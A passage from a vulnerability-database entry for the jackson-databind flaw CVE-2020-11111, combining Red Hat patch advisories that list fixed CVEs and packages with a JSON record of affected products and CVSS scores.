Search criteria
ⓘ
Use full-text search for keyword queries.
Combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by dates instead of relevance.
100 vulnerabilities found for WebLogic Server by Oracle
VAR-202003-1787
Vulnerability from variot - Updated: 2026-03-09 22:59FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms). FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Description:
Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and Business Optimizer for solving planning problems. It automates business decisions and makes that logic available to the entire business.
It is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.
Security Fix(es):
-
apache-commons-beanutils: does not suppresses the class property in PropertyUtilsBean by default (CVE-2019-10086)
-
cxf: does not restrict the number of message attachments (CVE-2019-12406)
-
cxf: OpenId Connect token service does not properly validate the clientId (CVE-2019-12419)
-
hibernate-validator: safeHTML validator allows XSS (CVE-2019-10219)
-
HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)
-
HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)
-
HTTP/2: flood using SETTINGS frames results in unbounded memory growth (CVE-2019-9515)
-
HTTP/2: large amount of data requests leads to denial of service (CVE-2019-9511)
-
jackson-databind: Multiple serialization gadgets (CVE-2019-17531, CVE-2019-16943, CVE-2019-16942, CVE-2019-17267, CVE-2019-14540, CVE-2019-16335, CVE-2019-14893, CVE-2019-14892, CVE-2020-9546, CVE-2020-9547, CVE-2020-9548, CVE-2020-10969, CVE-2020-10968, CVE-2020-11111, CVE-2020-11112, CVE-2020-11113, CVE-2020-11619, CVE-2020-11620, CVE-2019-20330, CVE-2020-8840)
-
jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10672, CVE-2020-10673)
-
keycloak: adapter endpoints are exposed via arbitrary URLs (CVE-2019-14820)
-
keycloak: missing signatures validation on CRL used to verify client certificates (CVE-2019-3875)
-
keycloak: SAML broker does not check existence of signature on document allowing any user impersonation (CVE-2019-10201)
-
keycloak: CSRF check missing in My Resources functionality in the Account Console (CVE-2019-10199)
-
keycloak: cross-realm user access auth bypass (CVE-2019-14832)
-
netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling (CVE-2020-7238)
-
SmallRye: SecuritySupport class is incorrectly public and contains a static method to access the current threads context class loader (CVE-2020-1729)
-
thrift: Out-of-bounds read related to TJSONProtocol or TSimpleJSONProtocol (CVE-2019-0210)
-
thrift: Endless loop when feed with specific input data (CVE-2019-0205)
-
undertow: possible Denial Of Service (DOS) in Undertow HTTP server listening on HTTPS (CVE-2019-14888)
-
wildfly: The 'enabled-protocols' value in legacy security is not respected if OpenSSL security provider is in use (CVE-2019-14887)
-
wildfly-core: Incorrect privileges for 'Monitor', 'Auditor' and 'Deployer' user by default (CVE-2019-14838)
-
xml-security: Apache Santuario potentially loads XML parsing code from an untrusted source (CVE-2019-12400)
For more details about the security issues and their impact, the CVSS score, acknowledgements, and other related information, see the CVE pages listed in the References section. You must be logged in to download the update.
NOTE: This advisory is an addendum to https://access.redhat.com/errata/RHBA-2020:1414 and is an informational advisory only, to clarify security fixes released therein. No code has been modified as part of this advisory. Description:
Red Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Summary:
This is a security update for JBoss EAP Continuous Delivery 19. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-18881 - Upgrade Undertow to 2.0.30.SP1 JBEAP-18974 - Upgrade snakeyaml to 1.26 JBEAP-18975 - Upgrade cryptacular to 1.2.4 JBEAP-18982 - Upgrade WildFly Core to 11.0.0.Final-redhat-00001 JBEAP-18983 - Upgrade Remoting JMX from 3.0.3 to 3.0.4 JBEAP-19041 - Upgrade WildFly Elytron to 1.11.3.Final JBEAP-19042 - Upgrade wildfly-core to 11.0.2.Final JBEAP-19076 - Upgrade resteasy from 3.11.0.Final to 3.11.1.Final JBEAP-19211 - Empty section Fixed CVEs in CD19 Release Notes
- Description:
Red Hat Data Grid is a distributed, in-memory, NoSQL datastore based on the Infinispan project.
This release of Red Hat Data Grid 7.3.7 serves as a replacement for Red Hat Data Grid 7.3.6 and includes bug fixes and enhancements, which are described in the Release Notes, linked to in the References section of this erratum. Solution:
To install this update, do the following:
- Download the Data Grid 7.3.7 server patch from the customer portal. See the download link in the References section. Back up your existing Data Grid installation. You should back up databases, configuration files, and so on. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes for patching instructions. Restart Data Grid to ensure the changes take effect. Bugs fixed (https://bugzilla.redhat.com/):
1595621 - CVE-2017-7658 jetty: Incorrect header handling 1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720 1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class 1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass 1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230 1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain 1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability 1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain 1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1816216 - CVE-2020-11612 netty: compression/decompression codecs don't enforce limits on buffer allocation sizes 1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking 1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config 1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap 1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core 1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime 1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication 1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly 1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop 1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender
- The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Installation instructions are available from the Fuse 7.7.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/
- Bugs fixed (https://bugzilla.redhat.com/):
1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl 1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents 1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API 1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service 1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake 1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries 1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. 1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: rh-maven35-jackson-databind security update Advisory ID: RHSA-2020:1523-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2020:1523 Issue date: 2020-04-21 Cross references: 1822587 1822174 1822932 1822937 1822927 CVE Names: CVE-2020-10968 CVE-2020-10969 CVE-2020-11111 CVE-2020-11112 CVE-2020-11113 =====================================================================
- Summary:
An update for rh-maven35-jackson-databind is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch
- Description:
The jackson-databind package provides general data-binding functionality for Jackson, which works on top of Jackson core streaming API.
Security Fix(es):
-
jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider (CVE-2020-10968)
-
jackson-databind: Serialization gadgets in javax.swing.JEditorPane (CVE-2020-10969)
-
jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory (CVE-2020-11111)
-
jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider (CVE-2020-11112)
-
jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime (CVE-2020-11113)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime
- Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source: rh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm
noarch: rh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm rh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-10968 https://access.redhat.com/security/cve/CVE-2020-10969 https://access.redhat.com/security/cve/CVE-2020-11111 https://access.redhat.com/security/cve/CVE-2020-11112 https://access.redhat.com/security/cve/CVE-2020-11113 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXp7oOtzjgjWX9erEAQghsBAAk6mN7QOctoM4gV9BDkYybnwjFrgzSgQg LahdpBV7QmHQ/6rdhSlbE8sGCdrUwLJy1GvRS1PzvUY2IzLf8c0rtzcHrIiD1wWB N5kEBWiNgHOpuU4etwbR9gGsY7hhSvyxzTyRhHU36UQJqyNoc95DfbokqeAf8Ggp dfw20J8hsCkQ6OkvDCM6T9fY7jcbHdiD4jx8WSMn3bQS3o8zRf1JJlMPOqLnHM+J 998+RIzoJYqqdL7XNWPMopvR1yps2Xx+NTL4+2Vg8e+2KVxO+ksIu3EqRsCRD0wT 22iPNX3r8ETjWcfLGw0Imvc8RiRsCL7L4oa+cbIpnBdvsRr/yW8IYmvJmHwFTZlK +vIyYPAfSCLuHSktXEwZ9WDMeFsJfZr+zdVZ5MmOgvMAIqg+0RSE3VBlzmuAOMbv yNz6SPODozvMDPmW1OwLhtGsu1CigORIuTRcNSYwTkXVoAxFhWXK0sHuxc3h1ne0 x38Tgk1grF7xbBSfvJwFn0MfBhufg4+iUuFhte7mtuSu3gvjQ/qt01Oo11p8cW2m g6lX1NGEsUpEONf0NS+1hFSxWB4ex7ln98e5AqNWtLHt3S5OHzI67+/4dgl5xF7J PdLv4j8b1AqTV8wRX6pK59OeslYcPhYdMWHEbMSkQJ3WZFOILkyTm6HWer9kl3Yt 8yoMyLl6FBM= =n1if -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.3"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.3"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "communications evolved communications application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "retail sales audit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "global lifecycle management opatch",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1.20"
},
{
"_id": null,
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.9.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.10.4"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "communications instant messaging server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0.1.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications session report manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "agile plm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.5.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.7"
},
{
"_id": null,
"model": "autovue for agile product lifecycle management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.2"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.0"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.0"
},
{
"_id": null,
"model": "communications calendar server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11111"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1737"
}
],
"trust": 1.4
},
"cve": "CVE-2020-11111",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-11111",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-163657",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-11111",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-11111",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2020-11111",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1737",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-163657",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-11111",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163657"
},
{
"db": "VULMON",
"id": "CVE-2020-11111"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1737"
},
{
"db": "NVD",
"id": "CVE-2020-11111"
},
{
"db": "NVD",
"id": "CVE-2020-11111"
}
]
},
"description": {
"_id": null,
"data": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms). FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Description:\n\nRed Hat Decision Manager is an open source decision management platform\nthat combines business rules management, complex event processing, Decision\nModel \u0026 Notation (DMN) execution, and Business Optimizer for solving\nplanning problems. It automates business decisions and makes that logic\navailable to the entire business. \n\nIt is recommended to halt the server by stopping the JBoss Application\nServer process before installing this update; after installing the update,\nrestart the server by starting the JBoss Application Server process. \n\nSecurity Fix(es):\n\n* apache-commons-beanutils: does not suppresses the class property in\nPropertyUtilsBean by default (CVE-2019-10086)\n\n* cxf: does not restrict the number of message attachments (CVE-2019-12406)\n\n* cxf: OpenId Connect token service does not properly validate the clientId\n(CVE-2019-12419)\n\n* hibernate-validator: safeHTML validator allows XSS (CVE-2019-10219)\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth\n(CVE-2019-9514)\n\n* HTTP/2: flood using SETTINGS frames results in unbounded memory growth\n(CVE-2019-9515)\n\n* HTTP/2: large amount of data requests leads to denial of service\n(CVE-2019-9511)\n\n* jackson-databind: Multiple serialization gadgets (CVE-2019-17531,\nCVE-2019-16943, CVE-2019-16942, CVE-2019-17267, CVE-2019-14540,\nCVE-2019-16335, CVE-2019-14893, CVE-2019-14892, CVE-2020-9546,\nCVE-2020-9547, CVE-2020-9548, CVE-2020-10969, CVE-2020-10968,\nCVE-2020-11111, CVE-2020-11112, CVE-2020-11113, CVE-2020-11619,\nCVE-2020-11620, CVE-2019-20330, CVE-2020-8840)\n\n* jackson-databind: mishandles the interaction between serialization\ngadgets and typing which could result in remote command \nexecution (CVE-2020-10672, CVE-2020-10673)\n\n* keycloak: adapter endpoints are exposed via arbitrary URLs\n(CVE-2019-14820)\n\n* keycloak: missing signatures validation on CRL used to verify client\ncertificates (CVE-2019-3875)\n\n* keycloak: SAML broker does not check existence of signature on document\nallowing any user impersonation (CVE-2019-10201)\n\n* keycloak: CSRF check missing in My Resources functionality in the Account\nConsole (CVE-2019-10199)\n\n* keycloak: cross-realm user access auth bypass (CVE-2019-14832)\n\n* netty: HTTP Request Smuggling due to Transfer-Encoding whitespace\nmishandling (CVE-2020-7238)\n\n* SmallRye: SecuritySupport class is incorrectly public and contains a\nstatic method to access the current threads context class loader\n(CVE-2020-1729)\n\n* thrift: Out-of-bounds read related to TJSONProtocol or\nTSimpleJSONProtocol (CVE-2019-0210)\n\n* thrift: Endless loop when feed with specific input data (CVE-2019-0205)\n\n* undertow: possible Denial Of Service (DOS) in Undertow HTTP server\nlistening on HTTPS (CVE-2019-14888)\n\n* wildfly: The \u0027enabled-protocols\u0027 value in legacy security is not\nrespected if OpenSSL security provider is in use (CVE-2019-14887)\n\n* wildfly-core: Incorrect privileges for \u0027Monitor\u0027, \u0027Auditor\u0027 and\n\u0027Deployer\u0027 user by default (CVE-2019-14838)\n\n* xml-security: Apache Santuario potentially loads XML parsing code from an\nuntrusted source (CVE-2019-12400)\n\nFor more details about the security issues and their impact, the CVSS\nscore, acknowledgements, and other related information, see the CVE pages\nlisted in the References section. You must be logged in to download the update. \n\nNOTE: This advisory is an addendum to\nhttps://access.redhat.com/errata/RHBA-2020:1414 and is an informational\nadvisory only, to clarify security fixes released therein. No code has been\nmodified as part of this advisory. Description:\n\nRed Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. Summary:\n\nThis is a security update for JBoss EAP Continuous Delivery 19. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-18881 - Upgrade Undertow to 2.0.30.SP1\nJBEAP-18974 - Upgrade snakeyaml to 1.26\nJBEAP-18975 - Upgrade cryptacular to 1.2.4\nJBEAP-18982 - Upgrade WildFly Core to 11.0.0.Final-redhat-00001\nJBEAP-18983 - Upgrade Remoting JMX from 3.0.3 to 3.0.4\nJBEAP-19041 - Upgrade WildFly Elytron to 1.11.3.Final\nJBEAP-19042 - Upgrade wildfly-core to 11.0.2.Final\nJBEAP-19076 - Upgrade resteasy from 3.11.0.Final to 3.11.1.Final\nJBEAP-19211 - Empty section Fixed CVEs in CD19 Release Notes\n\n6. Description:\n\nRed Hat Data Grid is a distributed, in-memory, NoSQL datastore based on the\nInfinispan project. \n\nThis release of Red Hat Data Grid 7.3.7 serves as a replacement for Red Hat\nData Grid 7.3.6 and includes bug fixes and enhancements, which are\ndescribed in the Release Notes, linked to in the References section of this\nerratum. Solution:\n\nTo install this update, do the following:\n\n1. Download the Data Grid 7.3.7 server patch from the customer portal. See\nthe download link in the References section. Back up your existing Data Grid installation. You should back up\ndatabases, configuration files, and so on. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes\nfor patching instructions. Restart Data Grid to ensure the changes take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1595621 - CVE-2017-7658 jetty: Incorrect header handling\n1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class\n1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly 